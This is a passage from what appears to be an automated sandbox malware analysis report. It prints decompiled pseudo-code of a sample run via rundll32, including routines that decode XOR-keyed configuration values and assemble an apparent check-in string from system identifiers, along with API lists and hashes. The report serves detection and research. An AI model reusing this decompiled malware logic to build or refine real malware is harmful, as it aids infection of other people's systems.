                                  • Part of subcall function 04A476E7: SysFreeString.OLEAUT32(?), ref: 04A477C6
                                  • Part of subcall function 04A47EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04A451D4,004F0053,00000000,?), ref: 04A47EAD
                                  • Part of subcall function 04A47EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04A451D4,004F0053,00000000,?), ref: 04A47ED7
                                  • Part of subcall function 04A47EA4: memset.NTDLL ref: 04A47EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 04A4109A
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: 9a8aad7ae3ef4606d0f8b0a5e60f769ff84868f75786325c946f5c81667def9e
                                • Instruction ID: ed598f775d1c8720f1290fc8f3997d68bc5eda45418f96e5d1a746ecfd5b1118
                                • Opcode Fuzzy Hash: 9a8aad7ae3ef4606d0f8b0a5e60f769ff84868f75786325c946f5c81667def9e
                                • Instruction Fuzzy Hash: 96015E36600169BFEB519FA9CC04DAEBBB9FBD4350F004565E904E6160E7B1ED518790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A44538, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A44538(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04A49AD9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E04A44ABF(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                0x04a44540
                                0x04a4455a
                                0x00000000
                                0x04a44576
                                0x04a44551
                                0x04a44558
                                0x00000000
                                0x00000000
                                0x04a4457d

                                APIs
                                • lstrlenW.KERNEL32(?,?,?,04A44CF3,3D04A4C0,80000002,04A49900,04A45C8D,74666F53,4D4C4B48,04A45C8D,?,3D04A4C0,80000002,04A49900,?), ref: 04A4455D
                                  • Part of subcall function 04A44ABF: SysAllocString.OLEAUT32(04A45C8D), ref: 04A44AD8
                                  • Part of subcall function 04A44ABF: SysFreeString.OLEAUT32(00000000), ref: 04A44B19
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreelstrlen
                                • String ID:
                                • API String ID: 3808004451-0
                                • Opcode ID: 7a79c449f7c6965e715bb6b935c6887ac303f76ce3283778924a484b234905ba
                                • Instruction ID: 1b0ee6c7be5c1e6d3557c84039db994cd73bd43a1082cea04ce359e212fc8efb
                                • Opcode Fuzzy Hash: 7a79c449f7c6965e715bb6b935c6887ac303f76ce3283778924a484b234905ba
                                • Instruction Fuzzy Hash: F5F0923200010EBFDF129F90DD05EEE3F6AEB98355F048024BA18540A0D732DAB1EBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 04A47FBE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E04A47FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x4a4d2a4; // 0x69b25f44
				if(E04A46247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x4a4d2d8 = _v8;
				}
				_t33 =  *0x4a4d2a4; // 0x69b25f44
				if(E04A46247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x4a4d2a4; // 0x69b25f44
				if(E04A46247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x4a4d238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x4a4d2a4; // 0x69b25f44
						_t45 = E04A49403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4a4d240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x4a4d2a4; // 0x69b25f44
						_t46 = E04A49403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4a4d244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x4a4d2a4; // 0x69b25f44
						_t47 = E04A49403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4a4d248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x4a4d2a4; // 0x69b25f44
						_t48 = E04A49403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x4a4d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x4a4d2a4; // 0x69b25f44
						_t49 = E04A49403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x4a4d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x4a4d2a4; // 0x69b25f44
						_t50 = E04A49403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x4a4d24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x4a4d2a4; // 0x69b25f44
								_t51 = E04A49403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04A4A0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04A49FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x4a4d2a4; // 0x69b25f44
								_t52 = E04A49403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04A4A0FD(0, _t52) != 0) {
								_t121 =  *0x4a4d32c; // 0x4e595b0
								E04A41128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x4a4d2a4; // 0x69b25f44
								_t53 = E04A49403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x4a4d2a8; // 0x40a5a8
								_t22 = _t54 + 0x4a4e252; // 0x616d692f
								 *0x4a4d2d4 = _t22;
								goto L60;
							} else {
								_t64 = E04A4A0FD(0, _t53);
								 *0x4a4d2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x4a4d2a4; // 0x69b25f44
										_t56 = E04A49403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x4a4d2a8; // 0x40a5a8
										_t23 = _t57 + 0x4a4e791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04A4A0FD(0, _t56);
									}
									 *0x4a4d340 = _t58;
									HeapFree( *0x4a4d238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                0x04a47fbe
                                0x04a47fc1
                                0x04a47fe1
                                0x04a47fef
                                0x04a47fef
                                0x04a47ff4
                                0x04a4800e
                                0x04a48276
                                0x04a4827d
                                0x04a48284
                                0x04a48284
                                0x04a48014
                                0x04a48030
                                0x04a48264
                                0x04a4826e
                                0x00000000
                                0x04a48036
                                0x04a48036
                                0x04a4803b
                                0x04a48051
                                0x04a4803d
                                0x04a4803d
                                0x04a4804a
                                0x04a4804a
                                0x04a4805b
                                0x04a4805d
                                0x04a48067
                                0x04a4806c
                                0x04a4806c
                                0x04a48067
                                0x04a48073
                                0x04a48089
                                0x04a48075
                                0x04a48075
                                0x04a48082
                                0x04a48082
                                0x04a4808d
                                0x04a4808f
                                0x04a48099
                                0x04a4809e
                                0x04a4809e
                                0x04a48099
                                0x04a480a5
                                0x04a480bb
                                0x04a480a7
                                0x04a480a7
                                0x04a480b4
                                0x04a480b4
                                0x04a480bf
                                0x04a480c1
                                0x04a480cb
                                0x04a480d0
                                0x04a480d0
                                0x04a480cb
                                0x04a480d7
                                0x04a480ed
                                0x04a480d9
                                0x04a480d9
                                0x04a480e6
                                0x04a480e6
                                0x04a480f1
                                0x04a480f3
                                0x04a480fd
                                0x04a48102
                                0x04a48102
                                0x04a480fd
                                0x04a48109
                                0x04a4811f
                                0x04a4810b
                                0x04a4810b
                                0x04a48118
                                0x04a48118
                                0x04a48123
                                0x04a48125
                                0x04a4812f
                                0x04a48134
                                0x04a48134
                                0x04a4812f
                                0x04a4813b
                                0x04a48151
                                0x04a4813d
                                0x04a4813d
                                0x04a4814a
                                0x04a4814a
                                0x04a48155
                                0x04a48168
                                0x04a48168
                                0x00000000
                                0x04a48157
                                0x04a48157
                                0x04a48161
                                0x00000000
                                0x04a48172
                                0x04a48172
                                0x04a48174
                                0x04a4818a
                                0x04a48176
                                0x04a48176
                                0x04a48183
                                0x04a48183
                                0x04a4818e
                                0x04a48190
                                0x04a48193
                                0x04a48194
                                0x04a4819b
                                0x04a4819d
                                0x04a4819e
                                0x04a4819e
                                0x04a4819b
                                0x04a481a5
                                0x04a481bb
                                0x04a481a7
                                0x04a481a7
                                0x04a481b4
                                0x04a481b4
                                0x04a481bf
                                0x04a481cd
                                0x04a481d7
                                0x04a481d7
                                0x04a481de
                                0x04a481f4
                                0x04a481e0
                                0x04a481e0
                                0x04a481ed
                                0x04a481ed
                                0x04a481f8
                                0x04a4820b
                                0x04a4820b
                                0x04a48210
                                0x04a48216
                                0x00000000
                                0x04a481fa
                                0x04a481fd
                                0x04a48202
                                0x04a48209
                                0x04a4821b
                                0x04a4821d
                                0x04a48233
                                0x04a4821f
                                0x04a4821f
                                0x04a4822c
                                0x04a4822c
                                0x04a48237
                                0x04a48243
                                0x04a48248
                                0x04a48248
                                0x04a48239
                                0x04a4823c
                                0x04a4823c
                                0x04a48256
                                0x04a4825b
                                0x04a48261
                                0x00000000
                                0x04a48261
                                0x00000000
                                0x04a48209
                                0x04a481f8
                                0x04a48161
                                0x04a48155

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A48063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A48095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A480C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A480F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A4812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A4815D
                                • HeapFree.KERNEL32(00000000,04A430F3,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008,?,04A430F3), ref: 04A4825B
                                • HeapFree.KERNEL32(00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008,?,04A430F3), ref: 04A4826E
                                  • Part of subcall function 04A4A0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,04A430F3,04A48241,00000000,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005), ref: 04A4A106
                                  • Part of subcall function 04A4A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,04A430F3), ref: 04A4A129
                                  • Part of subcall function 04A4A0FD: memset.NTDLL ref: 04A4A138
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: e67bb2e2c17af6fc11ffd74aaffac1029c07d07d56e6ba94617f4e5ebb9b3389
                                • Instruction ID: c582b800c4a21ec88a8cb3624fcd0e42f953ca04879ad7c373f1fb89fea136a1
                                • Opcode Fuzzy Hash: e67bb2e2c17af6fc11ffd74aaffac1029c07d07d56e6ba94617f4e5ebb9b3389
                                • Instruction Fuzzy Hash: 0581427CA11605AFEB11FBB8ED84D5F76BDEBD8700724091AE405DB604EA7EF9428720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A45450, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E04A45450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x4a4d018; // 0xefcf766a
				asm("bswap eax");
				_t61 =  *0x4a4d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x4a4d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E04A4D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x4a4d2a8; // 0x40a5a8
				_t3 = _t64 + 0x4a4e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x4a4d02c,  *0x4a4d004, _t59);
				_t67 = E04A43288();
				_t68 =  *0x4a4d2a8; // 0x40a5a8
				_t4 = _t68 + 0x4a4e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E04A4831C(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x4a4d2a8; // 0x40a5a8
					_t7 = _t126 + 0x4a4e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x4a4d238, 0, _v8);
				}
				_t73 = E04A49267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x4a4d2a8; // 0x40a5a8
					_t11 = _t121 + 0x4a4e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x4a4d238, 0, _v8);
				}
				_t146 =  *0x4a4d32c; // 0x4e595b0
				_t75 = E04A4284E(0x4a4d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x4a4d238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x4a4d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x4a4d238, _t152, _v20);
						goto L26;
					}
					E04A43239(GetTickCount());
					_t82 =  *0x4a4d32c; // 0x4e595b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x4a4d32c; // 0x4e595b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x4a4d32c; // 0x4e595b0
					_t148 = E04A47B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x4a4d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x4a4c28c);
					_push(_t148);
					_t94 = E04A4A677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x4a4d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04A47B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04A45433();
						L22:
						HeapFree( *0x4a4d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E04A49F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E04A4137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E04A48B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04A47953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04A48B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                0x04a45450
                                0x04a45450
                                0x04a45450
                                0x04a45459
                                0x04a45462
                                0x04a45464
                                0x04a45464
                                0x04a45471
                                0x04a4547c
                                0x04a4547f
                                0x04a45484
                                0x04a4548d
                                0x04a45490
                                0x04a45495
                                0x04a45498
                                0x04a4549d
                                0x04a454a0
                                0x04a454ac
                                0x04a454b9
                                0x04a454bb
                                0x04a454c1
                                0x04a454c6
                                0x04a454d1
                                0x04a454d3
                                0x04a454d6
                                0x04a454d8
                                0x04a454dd
                                0x04a454e3
                                0x04a454e8
                                0x04a454eb
                                0x04a454f0
                                0x04a454fd
                                0x04a454ff
                                0x04a45505
                                0x04a4550f
                                0x04a4550f
                                0x04a45511
                                0x04a45516
                                0x04a4551b
                                0x04a4551e
                                0x04a45523
                                0x04a45530
                                0x04a45532
                                0x04a45540
                                0x04a45540
                                0x04a45542
                                0x04a45550
                                0x04a45555
                                0x04a45557
                                0x04a4555c
                                0x04a4571d
                                0x04a45727
                                0x04a45730
                                0x04a45562
                                0x04a4556e
                                0x04a45574
                                0x04a45579
                                0x04a45711
                                0x04a4571b
                                0x00000000
                                0x04a4571b
                                0x04a45585
                                0x04a4558a
                                0x04a45593
                                0x04a455a4
                                0x04a455a8
                                0x04a455b1
                                0x04a455b7
                                0x04a455c6
                                0x04a455cd
                                0x04a455d6
                                0x04a455dc
                                0x04a45705
                                0x04a4570f
                                0x00000000
                                0x04a4570f
                                0x04a455e8
                                0x04a455ee
                                0x04a455ef
                                0x04a455f4
                                0x04a455f9
                                0x04a456fb
                                0x04a45703
                                0x00000000
                                0x04a45703
                                0x04a45602
                                0x04a45609
                                0x04a45611
                                0x04a45616
                                0x04a4561f
                                0x04a4562a
                                0x04a4562f
                                0x04a45634
                                0x04a45733
                                0x04a456e7
                                0x04a456e7
                                0x04a456ec
                                0x04a456f7
                                0x04a456f9
                                0x00000000
                                0x04a456f9
                                0x04a4563e
                                0x04a45643
                                0x04a45648
                                0x04a4564d
                                0x04a4565d
                                0x04a45660
                                0x04a45666
                                0x04a4566c
                                0x04a45672
                                0x04a45675
                                0x04a4567b
                                0x04a4567e
                                0x04a45683
                                0x04a45687
                                0x04a45687
                                0x04a45693
                                0x04a4569f
                                0x04a456a3
                                0x04a456a5
                                0x04a456aa
                                0x04a456ac
                                0x04a456b1
                                0x04a456b6
                                0x04a456c3
                                0x04a456cb
                                0x04a456ce
                                0x04a456ce
                                0x04a456aa
                                0x00000000
                                0x04a45695
                                0x04a45699
                                0x04a456d0
                                0x04a456d3
                                0x04a456dc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a456dc
                                0x04a4569b
                                0x00000000
                                0x04a4569b
                                0x04a45693

                                APIs
                                • GetTickCount.KERNEL32 ref: 04A45464
                                • wsprintfA.USER32 ref: 04A454B4
                                • wsprintfA.USER32 ref: 04A454D1
                                • wsprintfA.USER32 ref: 04A454FD
                                • HeapFree.KERNEL32(00000000,?), ref: 04A4550F
                                • wsprintfA.USER32 ref: 04A45530
                                • HeapFree.KERNEL32(00000000,?), ref: 04A45540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A4556E
                                • GetTickCount.KERNEL32 ref: 04A4557F
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A45593
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A455B1
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?,04E595B0), ref: 04A47BB8
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(?,?,?,04A49DA0,?,04E595B0), ref: 04A47BC0
                                  • Part of subcall function 04A47B8D: strcpy.NTDLL ref: 04A47BD7
                                  • Part of subcall function 04A47B8D: lstrcat.KERNEL32(00000000,?), ref: 04A47BE2
                                  • Part of subcall function 04A47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A47BFF
                                • StrTrimA.SHLWAPI(00000000,04A4C28C,?,04E595B0), ref: 04A455E8
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(04E59B08,00000000,00000000,7691C740,04A49DCB,00000000), ref: 04A4A687
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(?), ref: 04A4A68F
                                  • Part of subcall function 04A4A677: lstrcpy.KERNEL32(00000000,04E59B08), ref: 04A4A6A3
                                  • Part of subcall function 04A4A677: lstrcat.KERNEL32(00000000,?), ref: 04A4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04A45609
                                • lstrcpy.KERNEL32(?,?), ref: 04A45611
                                • lstrcat.KERNEL32(?,?), ref: 04A4561F
                                • lstrcat.KERNEL32(?,00000000), ref: 04A45625
                                  • Part of subcall function 04A47B3B: lstrlen.KERNEL32(?,00000000,04E59D18,00000000,04A45142,04E59F3B,?,?,?,?,?,69B25F44,00000005,04A4D00C), ref: 04A47B42
                                  • Part of subcall function 04A47B3B: mbstowcs.NTDLL ref: 04A47B6B
                                  • Part of subcall function 04A47B3B: memset.NTDLL ref: 04A47B7D
                                • wcstombs.NTDLL ref: 04A456B6
                                  • Part of subcall function 04A4137B: SysAllocString.OLEAUT32(?), ref: 04A413B6
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 04A456F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A45703
                                • HeapFree.KERNEL32(00000000,?,?,04E595B0), ref: 04A4570F
                                • HeapFree.KERNEL32(00000000,?), ref: 04A4571B
                                • HeapFree.KERNEL32(00000000,?), ref: 04A45727
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: 1409ead304acba2398456c21d81c4abd6478207790165ebdbdfca63e2a2ea49c
                                • Instruction ID: d8513f3bf78e686a3e63b0ac8db5ee28d18803af78fe1502ea0ae68f49b1eaba
                                • Opcode Fuzzy Hash: 1409ead304acba2398456c21d81c4abd6478207790165ebdbdfca63e2a2ea49c
                                • Instruction Fuzzy Hash: 68914979900108BFEB119FA4DC88AAEBBB9EFD8354F144454F509DB220D73AED52DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A43485, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E04A43485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04A44944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04A4A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4a4d260 & 0x00000001) != 0) {
